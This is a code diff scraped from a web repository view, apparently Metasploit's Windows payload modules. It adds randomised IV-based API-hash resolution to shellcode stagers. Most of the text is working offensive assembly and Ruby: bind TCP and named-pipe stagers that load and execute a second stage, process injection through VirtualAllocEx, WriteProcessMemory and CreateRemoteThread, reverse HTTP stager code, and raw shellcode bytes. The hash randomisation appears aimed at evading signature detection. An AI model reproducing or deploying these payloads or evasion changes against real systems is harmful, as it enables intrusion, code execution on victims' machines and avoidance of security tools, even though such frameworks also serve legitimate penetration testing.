@author = obj_hash['author'].nil? ? [] : obj_hash['author']
@author = obj_hash['author']
@author = (@author.nil? || @author.empty?) ? EMPTY_ARRAY : @author.map! { |a| Obj.dedup_string(a) }
@references = obj_hash['references']
@platform = obj_hash['platform']
@platform_list = parse_platform_list(@platform)
@arch = obj_hash['arch']
@references = (@references.nil? || @references.empty?) ? EMPTY_ARRAY : @references
@platform = Obj.dedup_string(obj_hash['platform'])
@platform_list = Obj.cached_platform_list(@platform)
@arch = Obj.dedup_string(obj_hash['arch'])
@rport = obj_hash['rport']
@mod_time = Time.parse(obj_hash['mod_time'])
@ref_name = obj_hash['ref_name']
@path = obj_hash['path']
@is_install_path = obj_hash['is_install_path']
@targets = obj_hash['targets']
@targets = (@targets.nil? || @targets.empty?) ? EMPTY_ARRAY : @targets
@check = obj_hash['check'] ? true : false
@post_auth = obj_hash['post_auth']
@default_credential = obj_hash['default_credential']
@notes = obj_hash['notes'].nil? ? {} : obj_hash['notes']
notes = obj_hash['notes']
@notes = (notes.nil? || notes.empty?) ? EMPTY_HASH : Obj.dedup_notes(notes)
@needs_cleanup = obj_hash['needs_cleanup']
@session_types = obj_hash['session_types']
@autofilter_ports = obj_hash['autofilter_ports']
@@ -292,18 +354,6 @@ class Obj
@references = @references.map {|r| r.dup.force_encoding(encoding)}
end
def parse_platform_list(platform_string)
return nil if platform_string.nil?
if platform_string.casecmp?('All')
# empty string represents all platforms in Msf::Module::PlatformList
platforms = ['']
else
platforms = platform_string.split(',')
end
Msf::Module::PlatformList.transform(platforms)
end
end
end
end
-1
View File
@@ -1,5 +1,4 @@
# -*- coding: binary -*-
require 'metasm'
module Msf
+1 -1
View File
@@ -68,7 +68,7 @@ if (!$s && ($f = 'socket_create') && is_callable($f)) {
$s_type = 'socket';
}
if (!$s_type) {
die('no socket funcs');
die('no socket func');
}
if (!$s) { die('no socket'); }
^
+13 -1
View File
@@ -84,7 +84,18 @@ module Msf::Payload::Windows
method = datastore[name]
method = 'thread' if (!method or @@exit_types.include?(method) == false)
raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V')
if respond_to?(:block_api_hash)
exit_hash = block_api_hash('kernel32.dll', {
'seh' => 'SetUnhandledExceptionFilter',
'thread' => 'ExitThread',
'process' => 'ExitProcess',
'none' => 'GetLastError'
}[method]).to_i(16)
else
exit_hash = @@exit_types[method]
end
raw[offset, 4] = [ exit_hash ].pack(pack || 'V')
return true
end
@@ -112,6 +123,7 @@ module Msf::Payload::Windows
# data into a buffer which is allocated with VirtualAlloc to avoid running
# out of stack space or NX problems.
# See the source file: /external/source/shellcode/windows/midstager.asm
# TODO: We should update the midstager to use block-api randomization (passing it to metasm, and block api...)
midstager =
"\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" +
"\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" +
+13 -13
View File
@@ -118,7 +118,7 @@ module Payload::Windows::BindNamedPipe
db #{raw_to_db(uuid_raw)} ; lpBuffer
get_uuid_address:
push edi : hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
push #{block_api_hash('kernel32.dll', 'WriteFile')}
call ebp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
^
end
@@ -154,7 +154,7 @@ module Payload::Windows::BindNamedPipe
call get_pipe_name ; lpName
db "#{full_pipe_name}", 0x00
get_pipe_name:
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
push #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
call ebp ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize,
; nInBufferSize, nDefaultTimeOut, lpSecurityAttributes)
mov edi, eax ; save hPipe (using sockedi convention)
@@ -171,11 +171,11 @@ module Payload::Windows::BindNamedPipe
connect_pipe:
push 0 ; lpOverlapped
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
push #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
call ebp ; ConnectNamedPipe(hPipe, lpOverlapped)
; check for failure
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
push #{block_api_hash('kernel32.dll', 'GetLastError')}
call ebp ; GetLastError()
cmp eax, 0x217 ; looking for ERROR_PIPE_CONNECTED
jz get_stage_size ; success
@@ -184,7 +184,7 @@ module Payload::Windows::BindNamedPipe
; wait before trying again
push #{retry_wait}
push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
push #{block_api_hash('kernel32.dll', 'Sleep')}
call ebp ; Sleep(millisecs)
jmp connect_pipe
^
@@ -202,7 +202,7 @@ module Payload::Windows::BindNamedPipe
push 0 ; lpMaxCollectionCount
push ecx ; lpMode (PIPE_WAIT)
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
push #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
call ebp ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout)
^
end
@@ -217,7 +217,7 @@ module Payload::Windows::BindNamedPipe
lea ecx, [esp+16] ; lpBuffer
push ecx
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
pop eax ; lpNumberOfBytesRead
pop esi ; lpBuffer (stage size)
@@ -238,7 +238,7 @@ module Payload::Windows::BindNamedPipe
push 0x1000 ; MEM_COMMIT
push esi ; dwLength
push 0 ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
^
@@ -267,7 +267,7 @@ module Payload::Windows::BindNamedPipe
push edx ; nNumberOfBytesToRead
push ebx ; lpBuffer
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
pop edx ; lpNumberOfBytesRead
^
@@ -283,13 +283,13 @@ module Payload::Windows::BindNamedPipe
push 0x8000 ; MEM_RELEASE
push 0 ; dwSize, 0 to decommit whole block
push ecx ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_RELEASE)
cleanup_file:
; cleanup the pipe handle
push edi ; file handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
push #{block_api_hash('kernel32.dll', 'CloseHandle')}
call ebp ; CloseHandle(hPipe)
jmp failure
@@ -319,14 +319,14 @@ module Payload::Windows::BindNamedPipe
call get_kernel32_name
db "kernel32", 0x00
get_kernel32_name:
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
push #{block_api_hash('kernel32.dll', 'GetModuleHandleA')}
call ebp ; GetModuleHandleA("kernel32")
call get_exit_name
db "ExitThread", 0x00
get_exit_name: ; lpProcName
push eax ; hModule
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
push #{block_api_hash('kernel32.dll', 'GetProcAddress')}
call ebp ; GetProcAddress(hModule, "ExitThread")
push 0 ; dwExitCode
call eax ; ExitProcess(0)
+11 -11
View File
@@ -121,14 +121,14 @@ module Payload::Windows::BindTcp
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
push 11
@@ -144,7 +144,7 @@ module Payload::Windows::BindTcp
; we do not specify a protocol [5]
push 1 ; push SOCK_STREAM
push #{addr_fam} ; push AF_INET/6
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
@@ -155,7 +155,7 @@ module Payload::Windows::BindTcp
push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
push #{block_api_hash('ws2_32.dll', 'bind')}
call ebp ; bind( s, &sockaddr_in, 16 );
^
@@ -170,18 +170,18 @@ module Payload::Windows::BindTcp
asm << %Q^
; backlog, pushed earlier [3]
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
push #{block_api_hash('ws2_32.dll', 'listen')}
call ebp ; listen( s, 0 );
; we set length for the sockaddr struct to zero, pushed earlier [2]
; we dont set the optional sockaddr param, pushed earlier [1]
push edi ; listening socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
push #{block_api_hash('ws2_32.dll', 'accept')}
call ebp ; accept( s, 0, 0 );
push edi ; push the listening socket
xchg edi, eax ; replace the listening socket with the new connected socket for further comms
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
push #{block_api_hash('ws2_32.dll', 'closesocket')}
call ebp ; closesocket( s );
^
@@ -204,7 +204,7 @@ module Payload::Windows::BindTcp
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -223,7 +223,7 @@ module Payload::Windows::BindTcp
push 0x1000 ; MEM_COMMIT
push esi ; push the newly received second stage length.
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
@@ -233,7 +233,7 @@ module Payload::Windows::BindTcp
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -261,7 +261,7 @@ module Payload::Windows::BindTcp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
+4 -4
View File
@@ -61,7 +61,7 @@ module Payload::Windows::BindTcpRc4
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -83,7 +83,7 @@ module Payload::Windows::BindTcpRc4
; push esi ; push the newly received second stage length.
push ecx ; push the alloc length
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
@@ -96,7 +96,7 @@ module Payload::Windows::BindTcpRc4
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -138,7 +138,7 @@ module Payload::Windows::BindTcpRc4
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
+21 -1
View File
@@ -10,12 +10,32 @@ module Msf
###
module Payload::Windows::BlockApi
@block_api_iv = nil
def block_api_iv(opts={})
@block_api_iv ||= rand(0x100000000)
end
def asm_block_api(opts={})
Rex::Payloads::Shuffle.from_graphml_file(
asm = Rex::Payloads::Shuffle.from_graphml_file(
File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'),
arch: ARCH_X86,
name: 'api_call'
)
iv = opts.fetch(:block_api_iv) { block_api_iv }
# Patch the assembly to set the correct IV
# db 0xbf, 0x00, 0x00, 0x00, 0x00 => mov edi, <iv>
iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
unless asm.include?("db 0xbf, 0x00, 0x00, 0x00, 0x00")
raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
end
asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
asm
end
def block_api_hash(mod, func, opts={})
iv = opts.fetch(:block_api_iv) { block_api_iv }
Rex::Text.block_api_hash(mod, func, iv: iv)
end
end
+6 -6
View File
@@ -18,7 +18,7 @@ module Payload::Windows::Exitfunk
when 'seh'
asm << %Q^
mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; SetUnhandledExceptionFilter(0)
@@ -32,14 +32,14 @@ module Payload::Windows::Exitfunk
when 'thread'
asm << %Q^
mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}
push #{block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
jl exitfunk_goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne exitfunk_goodbye ;
mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
mov ebx, #{block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
exitfunk_goodbye: ; We now perform the actual call to the exit function
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
@@ -48,7 +48,7 @@ module Payload::Windows::Exitfunk
when 'process', nil
asm << %Q^
mov ebx, 0x#{Msf::Payload::Windows.exit_types['process'].to_s(16)}
mov ebx, #{block_api_hash('kernel32.dll', 'ExitProcess')}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
@@ -56,7 +56,7 @@ module Payload::Windows::Exitfunk
when 'sleep'
asm << %Q^
mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
mov ebx, #{block_api_hash('kernel32.dll', 'Sleep')}
push 300000 ; 300 seconds
push ebx ; push the hash of the function
call ebp ; Sleep(300000)
@@ -31,7 +31,7 @@ module Payload::Windows::MigrateCommon
#{generate_migrate(opts)}
signal_event:
push dword [esi] ; Event handle is pointed at by esi
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
push #{block_api_hash('kernel32.dll', 'SetEvent')}
call ebp ; SetEvent(handle)
call_payload:
call dword [esi+8] ; Invoke the associated payload
@@ -32,7 +32,7 @@ module Payload::Windows::MigrateNamedPipe
mov edi, [esi+16] ; The duplicated pipe handle is in the migrate context.
signal_pipe_event:
push dword [esi] ; Event handle is pointed at by esi
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
push #{block_api_hash('kernel32.dll', 'SetEvent')}
call ebp ; SetEvent(handle)
call_pipe_payload:
call dword [esi+8] ; call the associated payload
+3 -3
View File
@@ -34,14 +34,14 @@ module Payload::Windows::MigrateTcp
push '32'
push 'ws2_'
push esp ; pointer to 'ws2_32'
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA('ws2_32')
init_networking:
mov eax, #{WSA_VERSION} ; EAX == version, and is also used for size
sub esp, eax ; allocate space for the WSAData structure
push esp ; Pointer to the WSAData structure
push eax ; Version required
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup(Version, &WSAData)
create_socket:
push eax ; eax is 0 on success, use it for flags
@@ -53,7 +53,7 @@ module Payload::Windows::MigrateTcp
push eax ; SOCK_STREAM
inc eax
push eax ; AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
xchg edi, eax
^
+18 -18
View File
@@ -70,21 +70,21 @@ module Msf::Payload::Windows::PrependMigrate
exitblock = %Q^
;sleep
push -1
push #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
push #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
call ebp ; Sleep( ... );
^
# Check to see if we can find exitfunc in the payload
exitfunc_block_asm = %Q^
exitfunk:
mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread
push #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
jl goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne goodbye ;
mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function
mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function
goodbye:
push 0x0 ; push the exit function parameter
push ebx ; push the hash of the exit function
@@ -135,7 +135,7 @@ module Msf::Payload::Windows::PrependMigrate
add esp,-400 ; adjust the stack to avoid corruption
lea edx,[esp+0x60]
push edx
push #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
push #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
call ebp ; GetStartupInfoA( &si );
lea eax,[esp+0x60] ; Put startupinfo pointer back in eax
@@ -158,7 +158,7 @@ module Msf::Payload::Windows::PrependMigrate
push esi ; lpCommandLine
push ebx ; lpApplicationName
push #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
push #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
call ebp ; CreateProcessA( &si );
; if we didn't get a new process, use this one
@@ -186,7 +186,7 @@ module Msf::Payload::Windows::PrependMigrate
xor ebx,ebx
push ebx ; address
push [edi] ; handle
push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
push #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
call ebp ; VirtualAllocEx( ...);
; eax now contains the destination
@@ -198,7 +198,7 @@ module Msf::Payload::Windows::PrependMigrate
begin_of_payload_return: ; lpBuffer
push eax ; lpBaseAddress
push [edi] ; hProcess
push #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
push #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
call ebp ; WriteProcessMemory( ...)
; run the code (CreateRemoteThread())
@@ -210,7 +210,7 @@ module Msf::Payload::Windows::PrependMigrate
push ebx ; stacksize
push ebx ; lpThreadAttributes
push [edi]
push #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
push #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
call ebp ; CreateRemoteThread( ...);
#{exitblock} ; jmp to exitfunc or long sleep
@@ -244,21 +244,21 @@ module Msf::Payload::Windows::PrependMigrate
;sleep
xor rcx,rcx
dec rcx ; rcx = -1
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" )
call rbp ; Sleep( ... );
EOS
exitfunc_block_asm = %Q^
exitfunk:
mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user...
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user...
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" )
call rbp ; GetVersion(); (AL will = major version and AH will = minor version)
add rsp, 40 ; cleanup the default param space on stack
cmp al, 0x6 ; If we are not running on Windows Vista, 2008 or 7
jl goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne goodbye ;
mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: ; We now perform the actual call to the exit function
push 0x0 ;
pop rcx ; set the exit function parameter
@@ -311,7 +311,7 @@ module Msf::Payload::Windows::PrependMigrate
; get our own startupinfo at esp+0x60
add rsp,-400 ; adjust the stack to avoid corruption
lea rcx,[rsp+0x30]
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" )
call rbp ; GetStartupInfoA( &si );
jmp getcommand
@@ -333,7 +333,7 @@ module Msf::Payload::Windows::PrependMigrate
mov r8, rcx ; lpProcessAttributes
mov rdx, rsi ; lpCommandLine
; rcx is already zero ; lpApplicationName
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" )
call rbp ; CreateProcessA( &si );
; if we didn't get a new process, use this one
@@ -363,7 +363,7 @@ module Msf::Payload::Windows::PrependMigrate
migrate_asm << <<-EOS
xor rdx,rdx ; address
mov rcx, [rdi] ; handle
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" )
call rbp ; VirtualAllocEx( ...);
; eax now contains the destination - save in ebx
@@ -377,7 +377,7 @@ module Msf::Payload::Windows::PrependMigrate
pop r8 ; lpBuffer
mov rdx, rax ; lpBaseAddress
mov rcx, [rdi] ; hProcess
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" )
call rbp ; WriteProcessMemory( ...);
; run the code (CreateRemoteThread())
@@ -389,7 +389,7 @@ module Msf::Payload::Windows::PrependMigrate
mov r8, rcx ; stacksize
;rdx already equals 0 ; lpThreadAttributes
mov rcx, [rdi]
mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" )
call rbp ; CreateRemoteThread( ...);
#{exitblock} ; jmp to exitfunc or long sleep
@@ -4,7 +4,6 @@ module Msf
module Payload::Windows::ReflectivePELoader
include Payload::Windows::BlockApi
def asm_reflective_pe_loader(opts)
prologue = ''
if opts[:is_dll] == true
prologue = %(
@@ -33,7 +32,7 @@ start: ;
push 0x103000 ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE
push dword [esp+12] ; dwSize
push 0x00 ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
push eax ; Save the new image base to stack
xor edx,edx ; Zero out the edx
@@ -129,7 +128,7 @@ LoadLibraryA:
push ecx ; Save ecx to stack
push edx ; Save edx to stack
push eax ; Push the address of linrary name string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" )
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA([esp+4])
pop edx ; Retrieve edx
pop ecx ; Retrieve ecx
@@ -139,7 +138,7 @@ GetProcAddress:
push edx ; Save edx to stack
push eax ; Push the address of proc name string
push ebx ; Push the dll handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" )
push #{block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(ebx,[esp+4])
pop edx ; Retrieve edx
pop ecx ; Retrieve ecx
+15 -15
View File
@@ -246,7 +246,7 @@ module Payload::Windows::ReverseHttp
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
push esp ; Push a pointer to the "wininet" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "wininet" )
xor ebx, ebx ; Set ebx to NULL to use in future arguments
^
@@ -285,7 +285,7 @@ module Payload::Windows::ReverseHttp
^
end
asm << %Q^
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
push #{block_api_hash('wininet.dll', 'InternetOpenA')}
call ebp
^
@@ -302,7 +302,7 @@ module Payload::Windows::ReverseHttp
db "#{opts[:url]}", 0x00
got_server_host:
push eax ; HINTERNET hInternet (still in eax from InternetOpenA)
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
push #{block_api_hash('wininet.dll', 'InternetConnectA')}
call ebp
mov esi, eax ; Store hConnection in esi
^
@@ -321,7 +321,7 @@ module Payload::Windows::ReverseHttp
; LPVOID lpBuffer (username from previous call)
push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
push esi ; hConnection
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
push #{block_api_hash('wininet.dll', 'InternetSetOptionA')}
call ebp
^
end
@@ -337,7 +337,7 @@ module Payload::Windows::ReverseHttp
; LPVOID lpBuffer (password from previous call)
push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
push esi ; hConnection
